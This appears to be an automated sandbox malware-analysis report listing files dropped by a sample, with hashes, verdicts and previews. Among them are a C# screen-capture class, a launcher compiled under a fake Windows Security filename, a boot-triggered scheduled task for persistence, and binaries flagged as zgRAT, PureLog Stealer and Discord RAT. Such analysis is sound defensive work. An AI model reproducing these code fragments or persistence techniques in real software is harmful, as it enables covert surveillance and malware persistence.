Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.1.f.f.b.x.q.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.1.f.f.b.x.q.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Reputation:	unknown
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
Category:	dropped
Size (bytes):	607
Entropy (8bit):	5.364493667515013
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5wkn2h:p37Lvkmb6KOkqe1xBkrk+ikOfcWZEif5
MD5:	3A51456AA0E9B354E2C1C7FF756C56CD
SHA1:	654C3C17460D017940E0D78779ABF6EF245C1265
SHA-256:	C49F37E435C2276A9D768DB57CED6DBE64FCE13058086A124F6FCD55C5F3AE2D
SHA-512:	0307D63C2E7D5BEDE6BA57150E2342BD57185F3EAAB3BC071CBFBB905823E0E026E98E885A3AC669C5EF8044E29BB32083F86A42129227095EBE1C453C30C800
Malicious:	false
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.0.cs"

C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.162094740254717
Encrypted:	false
SSDEEP:	48:6M7oEAtf0KhzBU/Ef6mtJbN0IpW1ul2ja3n8q:wNz0LmTOueK
MD5:	2ABD48C908EFFBAB737C437CCCEA9FDA
SHA1:	5DE708B5FDBA6EF9BA5BEC133293F59C5441B7F2
SHA-256:	509BDF849ADB0201949CBEBB0E3200B48021A21219DA485B58DBC25306E1EEA7
SHA-512:	13574EB54362F84CBABE9CE88759E05660D7784C4A7C6223604477AA2215A93189700BB5827D73440B856D454BD5744C0CEA1CFB6CC317315F960E796162AC60
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ef.f...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1148
Entropy (8bit):	5.524842573920555
Encrypted:	false
SSDEEP:	24:KJf+Id3ka6KOkqeFkOfNEif8Kax5DqBVKVrdFAMBJTH:u+kka6NkqeFkyNEu8K2DcVKdBJj
MD5:	BD340CA15980A7893A37BF7CB1FDE9BB
SHA1:	140AA01E96275121C03354A88509A9E7EEF436D9
SHA-256:	113DFD48477798775DCB0C0C416484711E6371D10F527A9A902681A0E4EC781A
SHA-512:	F7234766FEC8D923CD3A461D63C8C6064CB2F686A5D992981C9413EC337A6642484DF4054A8BCA6518610233F056288266EB2C6F3DF519ABC84F4BF9C076D8AB
Malicious:	false
Reputation:	unknown
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer

C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.0.cs

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	373
Entropy (8bit):	4.864872342857448
Encrypted:	false
SSDEEP:	6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L2hwBGXsiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLB3
MD5:	7772F79D9884E052D03C252F261A4D39
SHA1:	55737112AC33F2DFD71E1EF19A241B11A521D038
SHA-256:	1304C8532A0B0CC157665EC70AE3A10C82F91573613A82FC68D5DB95439B4589
SHA-512:	4BCC3326C77850B84B04EC3BE0067B094C77947DA8F6198B48BE2294C008BBABD19B2F173AF5D1C147431E8C2DFA4EE210CE55C92E04A909063B396622106A49
Malicious:	false
Reputation:	unknown
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\cscript.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	250
Entropy (8bit):	5.0489813326376165
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fkb8HDyA:Hu7L//TRq79cQWfsb8HDyA
MD5:	818938ADE525862CA78632707D773306
SHA1:	99F0B908FEDF4F3E0E9704767A23CB12FBAC9671
SHA-256:	8554875EAD824596D20C90049FDE751BB128DE831D0B3608C7ACA516996D6321
SHA-512:	1A2077066E374B15B92ABE28E4E5B48079889B22F151A49A7A279380D71860645537731CA21AA8F809E5FA82CA49278D0C24D31B8EB39047B1C8F7869DD4DF25
Malicious:	true
Reputation:	unknown
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.0.cs"

C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.out

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (360), with CRLF, CR line terminators
Category:	modified
Size (bytes):	781
Entropy (8bit):	5.250275821824712
Encrypted:	false
SSDEEP:	24:KJfC6MI/un/Vq79tWfskDy1Kax5DqBVKVrdFAMBJTH:uCTN/Vquw1K2DcVKdBJj
MD5:	41408A7809193D009BB595B5DBFDDFDE
SHA1:	3A354CF6DC335D33E1367C9E9A5947036E2D58D1
SHA-256:	B75005093845067B6D78B83196D3338742503130F179315845E671CEB3EAC41A
SHA-512:	DE087D967508FC37105A2C2516C125E78F5A75B87D7AF67BDFCBB9F9D861E5B773C17FD9D0A1BF0D9A43DCE330F8972236901D058176F7A78D89D4EC5F266820
Malicious:	false
Reputation:	unknown
Preview:	.C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp

Download File

Process:	C:\ProgramData\setup.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	161792
Entropy (8bit):	5.8318794599287465
Encrypted:	false
SSDEEP:	3072:lQbW78Kb89UMmY8MA1cRWr7BiKcOO1Sf7lHn4mr3yo4f8P2:lQK75bobwfBiKCYfhHLU5
MD5:	1667C96053EAA078109F8B0C9500FC9D
SHA1:	E0F567763BAAAA757F66F96951D9810F45F69F30
SHA-256:	F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4
SHA-512:	6285ADE5CB85B71814EDD57EDDC512A031596043B7FCE4FCC909A0B78ECFE161C062AD0637EC82CBDAA36675AD32FBD0C94DDD96BB575BE8B1FBB47DF706AAE1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$.......K...............D.......D...........o...9A......9A9.....9A......Rich............PE..d....t.d.........."....%.....X......X".........@..........................................`..................................................8.......p..`>...`..8....................5..8............................................0...............................text............................... ..`.rdata.......0......."..............@..@.data........P......................@....pdata..8....`.......6..............@..@.rsrc...`>...p...@...8..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yntnomxcupkb.xml

Download File

Process:	C:\ProgramData\setup.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	5.1015990235428035
Encrypted:	false
SSDEEP:	24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
MD5:	546D67A48FF2BF7682CEA9FAC07B942E
SHA1:	A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
SHA-256:	EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
SHA-512:	10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl

C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\e978f868350d50

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	216
Entropy (8bit):	5.72500271217595
Encrypted:	false
SSDEEP:	3:6xpgoJIbQrWdwQj1aFz/wkTQ+D3Tr1NyHCAcNESLQrkSo01mBkmNWc09RRVmtIq7:egoJFrW74FNPSmNE4SoMmSmnjT
MD5:	6CA437BA9CBE773C4FEB7925219F4FA7
SHA1:	F4937B63C7A8BE750E2E827F361438F94AA9CA42
SHA-256:	EF6EA15E26771712A4C64E916E73F93CAD96F9AD6D6EA5960278F9205886D21F
SHA-512:	32DAB39F35FDE15459621EBD219DAAF7E35EBF5200B701256DFE5EEEBA045F9C8B964FFEFF5CB6B033B7CCD03FE4A109EDADDA33AFF3D01E85178D0577D84B3B
Malicious:	false
Reputation:	unknown
Preview:	KBV7AhYL7PfWiwA9GuAix0EEM1umZv53I3xsuqJoYqmlX95Oiwv6ioZT7QvIxwwLTmOp9SPZlVJHOdrN6fEmA8Uddeud5B1m3aRvvPPPhWVNfREdjiLRrJLVSuLfhvejehNyM5brQyFnmH8MZQ3W0j4uO5cADtsv2wt8EPRnGdA3DhsLv9FQ2Ht4mckQdbngGUv0YAHJ8PQWjBqqMROEob2v

C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Users\user\AppData\Roaming\RuntimeBroker.exe

Download File

Process:	C:\Users\user\Desktop\87Bym0x4Fy.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22224360
Entropy (8bit):	7.999088376739381
Encrypted:	true
SSDEEP:	393216:b8zTb8tvaGXUeGj1/fBtFAnBMhsP8ZMKNiPJHREPKmahPKDpn:b83JDD1Rt2nB0uKNo6ahPKN
MD5:	A83964F260C28614DA067F6B3DF9E044
SHA1:	157304B579228E7D41E6218EAC935339854BB431
SHA-256:	F5D2B5A19575E7B3041B846263316F66F80C2804F9E0F2376E1576612D27CCA8
SHA-512:	DD4E8FA7FB45F091FD875EB347BB594EF7D890921255E2BA985E4F96A938B4997CE81F51A5951F3633D93C38E336E8FB4DC7EEEC6545203076865EC6B0E232E1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d....8.f.........."....(.....r.................@......................................S...`.................................................l...x............`..."..............h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...............................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe

Download File

Process:	C:\Users\user\Desktop\87Bym0x4Fy.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	80896
Entropy (8bit):	5.530506199019335
Encrypted:	false
SSDEEP:	1536:lCH0jBD2BKkwbPNrfxCXhRoKV6+V+y9viwL:MUjBD2BPwbPNrmAE+Mqq
MD5:	95AF6E5D52A57515DC2E638C419F50D9
SHA1:	D359ABC0EBB9877C917E125FB4E28C24B27696A4
SHA-256:	0FE67ABFD1A323E19A065A54D544F0997F5853F7A51A3526C10C1A15BF5B5749
SHA-512:	CFB2D075D75AF7F965E961ECCBF3F188E64A5B594E556A9BF8569F2C2380065FB2781E4E4689D87B7AF65066CAC217E59CF0A7D32F43F2BD61938AA06791B50B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DiscordRat, Description: Yara detected Discord Rat, Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0..4............... .....@..... ...............................w....`...@......@............... ...............................`..............................pQ..8............................................................ ..H............text....2... ...4.................. ..`.rsrc........`.......6..............@..@........................................H.......8...8.............................................................{...."..}........0..7.........(....}.......}.......}......\|......(...+..\|....(......0..?.........(....}.......}.......}.......}......\|......(...+..\|....(......0..7.........(....}.......} ......}......\|......(...+..\|....(......0..7.........(....}%......}&......}$.....\|%.....(...+..\|%...(......0..?.........(....}-......}/......}.......},.....\|-.....(...+..\|-...(....2.(....o....J. . ..}.....(....*2.(....(.

C:\Users\user\Desktop\BhVFUouj.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DLBNVQXk.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\FGEdMQBa.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FOowrzbf.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IIrMizFV.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KBGuTvrT.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

